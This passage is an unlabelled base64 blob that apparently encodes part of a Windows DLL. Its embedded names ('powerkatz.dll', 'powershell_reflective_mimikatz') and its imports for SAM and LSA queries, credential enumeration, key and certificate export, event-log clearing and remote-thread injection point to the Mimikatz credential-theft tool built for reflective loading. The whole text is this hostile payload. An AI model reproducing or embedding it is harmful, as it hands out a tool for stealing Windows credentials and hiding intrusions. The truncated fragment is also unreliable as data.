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XVpcmVDb250ZXh0VwAAmgBDcnlwdEdldEtleVBhcmFtAACgAENyeXB0UmVsZWFzZUNvbnRleHQAkwBDcnlwdEVudW1Qcm92aWRlcnNXAJsAQ3J5cHRHZXRQcm92UGFyYW0AjABDcnlwdERlc3Ryb3lLZXkAnABDcnlwdEdldFVzZXJLZXkAqwFPcGVuRXZlbnRMb2dXAAQBR2V0TnVtYmVyT2ZFdmVudExvZ1JlY29yZHMAADoAQ2xlYXJFdmVudExvZ1cAAGUAQ3JlYXRlU2VydmljZVcAAEMCU2V0U2VydmljZU9iamVjdFNlY3VyaXR5AAAqAEJ1aWxkU2VjdXJpdHlEZXNjcmlwdG9yVwAAwgFRdWVyeVNlcnZpY2VPYmplY3RTZWN1cml0eQAAHQBBbGxvY2F0ZUFuZEluaXRpYWxpemVTaWQAAOIARnJlZVNpZACZAENyeXB0R2V0SGFzaFBhcmFtAKIAQ3J5cHRTZXRLZXlQYXJhbQAAcAJTeXN0ZW1GdW5jdGlvbjAzMgBVAlN5c3RlbUZ1bmN0aW9uMDA1AJ8AQ3J5cHRJbXBvcnRLZXkAAGkCU3lzdGVtRnVuY3Rpb24wMjUAiABDcnlwdENyZWF0ZUhhc2gAiQBDcnlwdERlY3J5cHQAAIsAQ3J5cHREZXN0cm95SGFzaAAAZAFMc2FGcmVlTWVtb3J5AJ0AQ3J5cHRIYXNoRGF0YQCxAU9wZW5UaHJlYWRUb2tlbgBFAlNldFRocmVhZFRva2VuAAC0AER1cGxpY2F0ZVRva2VuRXgAADgAQ2hlY2tUb2tlbk1lbWJlcnNoaXAAAGwAQ3JlZEZyZWUAAGsAQ3JlZEVudW1lcmF0ZVcAAEFEVkFQSTMyLmRsbAAAdQBDcnlwdEJpbmFyeVRvU3RyaW5nVwAAcwBDcnlwdEFjcXVpcmVDZXJ0aWZpY2F0ZVByaXZhdGVLZXkARgBDZXJ0R2V0TmFtZVN0cmluZ1cAAFAAQ2VydE9wZW5TdG9yZQA8AENlcnRGcmVlQ2VydGlmaWNhdGVDb250ZXh0AAAEAENlcnRBZGRDZXJ0aWZpY2F0ZUNvbnRleHRUb1N0b3JlAAAPAENlcnRDbG9zZVN0b3JlAABBAENlcnRHZXRDZXJ0aWZpY2F0ZUNvbnRleHRQcm9wZXJ0eQApAENlcnRFbnVtQ2VydGlmaWNhdGVzSW5TdG9yZQAsAENlcnRFbnVtU3lzdGVtU3RvcmUAAwFQRlhFeHBvcnRDZXJ0U3RvcmVFeAAAQ1JZUFQzMi5kbGwABQBDRExvY2F0ZUNTeXN0ZW0ABABDREdlbmVyYXRlUmFuZG9tQml0cwAABgBDRExvY2F0ZUNoZWNrU3VtAAALAE1ENUZpbmFsAAANAE1ENVVwZGF0ZQAMAE1ENUluaXQAY3J5cHRkbGwuZGxsAAABAERzQWRkU2lkSGlzdG9yeVcAAAUARHNCaW5kVwBdAERzVW5CaW5kVwBOVERTQVBJLmRsbABOAFBhdGhJc1JlbGF0aXZlVwAiAFBhdGhDYW5vbmljYWxpemVXACQAUGF0aENvbWJpbmVXAABTSExXQVBJLmRsbAAmAFNhbVF1ZXJ5SW5mb3JtYXRpb25Vc2VyAAYAU2FtQ2xvc2VIYW5kbGUAABQAU2FtRnJlZU1lbW9yeQATAFNhbUVudW1lcmF0ZVVzZXJzSW5Eb21haW4AIQBTYW1PcGVuVXNlcgAdAFNhbUxvb2t1cE5hbWVzSW5Eb21haW4AABwAU2FtTG9va3VwSWRzSW5Eb21haW4AAB8AU2FtT3BlbkRvbWFpbgAHAFNhbUNvbm5lY3QAABEAU2FtRW51bWVyYXRlRG9tYWluc0luU2FtU2VydmVyAAAYAFNhbUdldEdyb3Vwc0ZvclVzZXIALABTYW1SaWRUb1NpZAAbAFNhbUxvb2t1cERvbWFpbkluU2FtU2VydmVyAAAVAFNhbUdldEFsaWFzTWVtYmVyc2hpcABTQU1MSUIuZGxsAAAoAExzYUxvb2t1cEF1dGhlbnRpY2F0aW9uUGFja2FnZQAAJQBMc2FGcmVlUmV0dXJuQnVmZmVyACMATHNhRGVyZWdpc3RlckxvZ29uUHJvY2VzcwAiAExzYUNvbm5lY3RVbnRydXN0ZWQAIQBMc2FDYWxsQXV0aGVudGljYXRpb25QYWNrYWdlAABTZWN1cjMyLmRsbAAHAENvbW1hbmRMaW5lVG9Bcmd2VwAAU0hFTEwzMi5kbGwAmwFJc0NoYXJBbHBoYU51bWVyaWNXAFVTRVIzMi5kbGwAAAUATUQ0VXBkYXRlAAMATUQ0RmluYWwAAAQATUQ0SW5pdABhZHZhcGkzMi5kbGwAABQAUnRsVW5pY29kZVN0cmluZ1RvQW5zaVN0cmluZwAADQBSdGxGcmVlQW5zaVN0cmluZwASAFJ0bEluaXRVbmljb2RlU3RyaW5nAAAMAFJ0bEVxdWFsVW5pY29kZVN0cmluZwABAE50UXVlcnlPYmplY3QAAgBOdFF1ZXJ5U3lzdGVtSW5mb3JtYXRpb24AAA8AUnRsR2V0Q3VycmVudFBlYgAAAABOdFF1ZXJ5SW5mb3JtYXRpb25Qcm9jZXNzAAkAUnRsQ3JlYXRlVXNlclRocmVhZAATAFJ0bFN0cmluZ0Zyb21HVUlEAA4AUnRsRnJlZVVuaWNvZGVTdHJpbmcAABAAUnRsR2V0TnRWZXJzaW9uTnVtYmVycwAAFgBSdGxVcGNhc2VVbmljb2RlU3RyaW5nAAAIAFJ0bEFwcGVuZFVuaWNvZGVTdHJpbmdUb1N0cmluZwAABwBSdGxBbnNpU3RyaW5nVG9Vbmljb2RlU3RyaW5nAAADAE50UmVzdW1lUHJvY2VzcwAGAFJ0bEFkanVzdFByaXZpbGVnZQAABABOdFN1c3BlbmRQcm9jZXNzAAAFAE50VGVybWluYXRlUHJvY2VzcwAACwBSdGxFcXVhbFN0cmluZwAAbnRkbGwuZGxsAI0DVmlydHVhbFByb3RlY3QAAF0DU2xlZXAAyABGaWxlVGltZVRvU3lzdGVtVGltZQAAVAJMb2NhbEFsbG9jAABYAkxvY2FsRnJlZQCrA1dyaXRlRmlsZQCxAlJlYWRGaWxlAABZAENyZWF0ZUZpbGVXAPEARmx1c2hGaWxlQnVmZmVycwAAZwFHZXRGaWxlU2l6ZUV4AEQBR2V0Q3VycmVudERpcmVjdG9yeVcAADYAQ2xvc2VIYW5kbGUARQFHZXRDdXJyZW50UHJvY2VzcwCCAk9wZW5Qcm9jZXNzAHMBR2V0TGFzdEVycm9yAACWAER1cGxpY2F0ZUhhbmRsZQCNAERldmljZUlvQ29udHJvbAAjA1NldEZpbGVQb2ludGVyAACPA1ZpcnR1YWxRdWVyeQAAigNWaXJ0dWFsRnJlZQCQA1ZpcnR1YWxRdWVyeUV4AACLA1ZpcnR1YWxGcmVlRXgAtAJSZWFkUHJvY2Vzc01lbW9yeQCIA1ZpcnR1YWxBbGxvYwAAjgNWaXJ0dWFsUHJvdGVjdEV4AACJA1ZpcnR1YWxBbGxvY0V4AAC0A1dyaXRlUHJvY2Vzc01lbW9yeQAAZAJNYXBWaWV3T2ZGaWxlAHgDVW5tYXBWaWV3T2ZGaWxlAFgAQ3JlYXRlRmlsZU1hcHBpbmdXAABbAkxvY2FsUmVBbGxvYwAAbABDcmVhdGVQcm9jZXNzVwAALwNTZXRMYXN0RXJyb3IAAJcDV2FpdEZvclNpbmdsZU9iamVjdABtAENyZWF0ZVJlbW90ZVRocmVhZAAASwFHZXREYXRlRm9ybWF0VwAA4wFHZXRUaW1lRm9ybWF0VwAAxwBGaWxlVGltZVRvTG9jYWxGaWxlVGltZQDYAEZpbmRGaXJzdEZpbGVXAADMAUdldFN5c3RlbVRpbWVBc0ZpbGVUaW1lAGQBR2V0RmlsZUF0dHJpYnV0ZXNXAADRAEZpbmRDbG9zZQDgAEZpbmROZXh0RmlsZVcA+wBGcmVlTGlicmFyeQBRAkxvYWRMaWJyYXJ5VwAAogFHZXRQcm9jQWRkcmVzcwAAhAFHZXRNb2R1bGVIYW5kbGVXAAD5AlNldENvbnNvbGVDdXJzb3JQb3NpdGlvbgAAuwFHZXRTdGRIYW5kbGUAAMsARmlsbENvbnNvbGVPdXRwdXRDaGFyYWN0ZXJXADoBR2V0Q29uc29sZVNjcmVlbkJ1ZmZlckluZm8AABIDU2V0Q3VycmVudERpcmVjdG9yeVcAAEgBR2V0Q3VycmVudFRocmVhZAAARgFHZXRDdXJyZW50UHJvY2Vzc0lkAEtFUk5FTDMyLmRsbAAABAVfdnNjd3ByaW50ZgBaBXdjc3JjaHIAUQV3Y3NjaHIAAAcFX3djc2ljbXAAAPoEX3N0cmljbXAAAAkFX3djc25pY21wAFwFd2Nzc3RyAABfBXdjc3RvdWwAXQV3Y3N0b2wAAAoFX3djc3RvdWk2NAAA9gBfZXJybm8AAOAEdmZ3cHJpbnRmACcEZmZsdXNoAACxA193Zm9wZW4ADAFfZmlsZW5vAG8BX2lvYgAAJARmY2xvc2UAADoEZnJlZQAAdANfd2NzZHVwAG1zdmNydC5kbGwAAIAEbWVtY3B5AACEBG1lbXNldAAAUwBfX0Nfc3BlY2lmaWNfaGFuZGxlcgAAUgBfWGNwdEZpbHRlcgB0BG1hbGxvYwAAbAFfaW5pdHRlcm0AoABfYW1zZ19leGl0AAATBGNhbGxvY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